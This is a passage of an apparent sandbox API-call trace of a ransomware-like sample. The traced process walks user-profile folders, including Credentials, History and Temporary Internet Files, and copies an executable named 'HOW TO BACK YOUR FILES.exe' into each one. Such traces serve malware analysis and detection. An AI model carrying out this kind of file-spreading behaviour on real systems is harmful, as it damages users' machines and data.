Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac78c80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac78c80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.538] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.538] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.538] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0042.538] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0042.538] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.538] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\feeds\\microsoft feeds~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.538] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.539] GetLastError () returned 0x0 [0042.539] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.539] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.539] CloseHandle (hObject=0x118) returned 1 [0042.539] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.539] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.539] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.539] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.539] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" [0042.539] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" [0042.539] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.539] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\microsoft\\credentials\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.540] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.540] GetLastError () returned 0x0 [0042.540] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.540] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.540] CloseHandle (hObject=0x118) returned 1 [0042.540] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.540] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.540] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.540] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.540] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History" [0042.540] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History" [0042.540] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.541] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\history\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.541] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.541] GetLastError () returned 0x0 [0042.541] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.541] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.541] CloseHandle (hObject=0x118) returned 1 [0042.541] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.541] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.542] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.542] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.542] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\Low" [0042.542] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\Low" [0042.542] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.542] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\history\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.542] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.542] GetLastError () returned 0x0 [0042.542] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.543] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.543] CloseHandle (hObject=0x118) returned 1 [0042.543] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.543] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\Low\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.543] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.543] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.543] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5" [0042.543] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5" [0042.543] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.543] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\history\\history.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.544] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.544] GetLastError () returned 0x0 [0042.544] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.544] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.544] CloseHandle (hObject=0x118) returned 1 [0042.544] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.544] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.544] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.544] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.544] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data" [0042.544] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data" [0042.544] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.544] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.545] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.545] GetLastError () returned 0x0 [0042.545] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.545] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.545] CloseHandle (hObject=0x118) returned 1 [0042.545] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.545] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f874e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f874e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.546] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.546] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.546] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" [0042.546] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" [0042.546] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.546] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\temporary internet files\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.546] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.546] GetLastError () returned 0x0 [0042.546] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.546] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.547] CloseHandle (hObject=0x118) returned 1 [0042.547] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.547] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a3658a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a3658a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.547] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.547] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.547] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0042.547] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0042.547] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.547] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\temporary internet files\\virtualized\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.548] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.548] GetLastError () returned 0x0 [0042.548] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.548] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.548] CloseHandle (hObject=0x118) returned 1 [0042.548] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.548] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.548] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.548] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.548] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0042.548] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0042.548] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.548] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\temporary internet files\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.549] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.549] GetLastError () returned 0x0 [0042.549] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.549] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.549] CloseHandle (hObject=0x118) returned 1 [0042.549] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.549] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application 